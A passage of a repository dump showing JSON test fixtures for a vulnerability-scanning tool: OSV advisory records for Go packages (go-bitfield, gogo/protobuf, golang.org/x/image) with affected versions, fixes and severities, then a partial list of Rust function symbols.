"SEMVER" } ] } ], "aliases": [ "CVE-2022-41727" ], "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ], "schema_version": "1.3.0", "summary": "" } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/vulnbyid-no-call-data.json ================================================ { "GHSA-2h6c-j3gf-xp9r": { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, "GHSA-c3h9-896r-86jm": { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, "GHSA-qgc7-mgm3-q253": { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, "GO-2021-0053": { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] }, "GO-2023-1558": { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] }, "GO-2023-1572": { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727", "GHSA-qgc7-mgm3-q253" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } } ================================================ FILE: internal/sourceanalysis/testdata/json/vulnbyid.json ================================================ { "GHSA-2h6c-j3gf-xp9r": { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, "GHSA-c3h9-896r-86jm": { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, "GHSA-qgc7-mgm3-q253": { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, "GO-2021-0053": { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] }, "GO-2023-1558": { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] }, "GO-2023-1572": { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727", "GHSA-qgc7-mgm3-q253" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } } ================================================ FILE: internal/sourceanalysis/testdata/rust/functions/medium.json ================================================ { "\u0026T::fmt": {}, "alloc::alloc::Global::deallocate": {}, "alloc::alloc::Global::grow": {}, "alloc::alloc::Global::grow_impl": {}, "alloc::alloc::box_free": {}, "alloc::alloc::dealloc": {}, "alloc::alloc::realloc": {}, "alloc::raw_vec::RawVec::current_memory": {}, "alloc::raw_vec::RawVec::drop": {}, "alloc::raw_vec::RawVec::grow_amortized": {}, "alloc::raw_vec::RawVec::ptr": {}, "alloc::raw_vec::RawVec::reserve_for_push": {}, "alloc::raw_vec::RawVec::set_ptr_and_cap": {}, "alloc::raw_vec::finish_grow": {}, "alloc::raw_vec::handle_reserve": {}, "alloc::rc::is_dangling": {}, "alloc::sync::Arc::drop": {}, "alloc::sync::Arc::drop_slow": {}, "alloc::sync::Arc::get_mut_unchecked": {}, "alloc::sync::Arc::inner": {}, "alloc::sync::Weak::drop": {}, "alloc::sync::Weak::inner": {}, "alloc::vec::Vec::as_mut_ptr": {}, "alloc::vec::Vec::drop": {}, "alloc::vec::Vec::new": {}, "alloc::vec::Vec::push": {}, "arrayvec::ArrayVec::clear": {}, "arrayvec::ArrayVec::drop": {}, "arrayvec::ArrayVec::len": {}, "arrayvec::ArrayVec::pop": {}, "arrayvec::ArrayVec::set_len": {}, "core::alloc::layout::Layout::array": {}, "core::alloc::layout::Layout::array::inner": {}, "core::alloc::layout::Layout::for_value_raw": {}, "core::cmp::Ord::max": {}, "core::cmp::max": {}, "core::core_arch::x86::sse2::mm_load_si128": {}, "core::core_arch::x86::sse2::mm_movemask_epi8": {}, "core::fmt::Arguments::new_v1": {}, "core::fmt::Arguments::new_v1_formatted": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for i32\u003e::fmt": {}, "core::fmt::num::\u003cimpl core::fmt::Debug for usize\u003e::fmt": {}, "core::mem::drop": {}, "core::mem::maybe_uninit::MaybeUninit::assume_init": {}, "core::mem::size_of_val_raw": {}, "core::num::\u003cimpl isize\u003e::wrapping_neg": {}, "core::num::\u003cimpl isize\u003e::wrapping_sub": {}, "core::num::\u003cimpl usize\u003e::checked_add": {}, "core::num::\u003cimpl usize\u003e::checked_mul": {}, "core::num::\u003cimpl usize\u003e::overflowing_add": {}, "core::num::\u003cimpl usize\u003e::overflowing_mul": {}, "core::panicking::assert_failed": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::add": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::as_ref": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::guaranteed_eq": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::is_null": {}, "core::ptr::const_ptr::\u003cimpl *const T\u003e::offset": {}, "core::ptr::drop_in_place\u003c\u0026usize\u003e": {}, "core::ptr::drop_in_place\u003c(alloc::string::String,usize)\u003e": {}, "core::ptr::drop_in_place\u003c(regex::dfa::State,u32)\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::string::String]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::vec::Vec\u003c(usize,u16)\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[alloc::vec::Vec]\u003e": {}, "core::ptr::drop_in_place\u003c[core::option::Option\u003calloc::string::String\u003e]\u003e": {}, "core::ptr::drop_in_place\u003c[regex::dfa::State]\u003e": {}, "core::ptr::drop_in_place\u003c[regex::prog::Inst]\u003e": {}, "core::ptr::drop_in_place\u003c[regex_syntax::hir::literal::Literal]\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::ahocorasick::AhoCorasick\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::api::SearchKind\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::api::Searcher\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::pattern::Patterns\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::rabinkarp::RabinKarp\u003e": {}, "core::ptr::drop_in_place\u003caho_corasick::packed::teddy::runtime::Teddy\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[(char,char)]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003c[usize]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003ccrossbeam_epoch::sync::queue::Node\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003cdyn core::ops::function::Fn\u003c()\u003e+Output = core::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e+core::panic::unwind_safe::UnwindSafe+core::marker::Send+core::marker::Sync+core::panic::unwind_safe::RefUnwindSafe\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::boxed::Box\u003cregex::pool::Pool\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003c(usize,u16)\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003calloc::vec::Vec\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003ccore::option::Option\u003calloc::string::String\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003ccore::option::Option\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::backtrack::Job\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::dfa::State\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::pikevm::FollowEpsilon\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex::prog::Inst\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003cregex_syntax::hir::literal::Literal\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::raw_vec::RawVec\u003e": {}, "core::ptr::drop_in_place\u003calloc::string::String\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003ccrossbeam_epoch::internal::Global\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cregex::exec::ExecReadOnly\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Arc\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003c[u8]\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003ccrossbeam_epoch::internal::Global\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cdyn aho_corasick::ahocorasick::AcAutomaton\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cregex::exec::ExecReadOnly\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::sync::Weak\u003cstd::collections::hash::map::HashMap\u003calloc::string::String,usize\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::vec::Vec\u003c(usize,u16)\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003calloc::vec::Vec\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003ccore::option::Option\u003calloc::string::String\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003ccore::option::Option\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::backtrack::Job\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::dfa::State\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::pikevm::FollowEpsilon\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex::prog::Inst\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003cregex_syntax::hir::literal::Literal\u003e\u003e": {}, "core::ptr::drop_in_place\u003calloc::vec::Vec\u003e": {}, "core::ptr::drop_in_place\u003carrayvec::ArrayVec\u003c[crossbeam_epoch::deferred::Deferred; 64]\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::UnsafeCell\u003calloc::vec::Vec\u003calloc::boxed::Box\u003ccore::panic::unwind_safe::AssertUnwindSafe\u003ccore::cell::RefCell\u003cregex::exec::ProgramCacheInner\u003e\u003e\u003e\u003e\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::cell::UnsafeCell\u003cregex::exec::ProgramCacheInner\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003caho_corasick::ahocorasick::AhoCorasick\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003calloc::string::String\u003e\u003e": {}, "core::ptr::drop_in_place\u003ccore::option::Option\u003ccrossbeam_epoch::internal::SealedBag\u003e\u003e": {}, 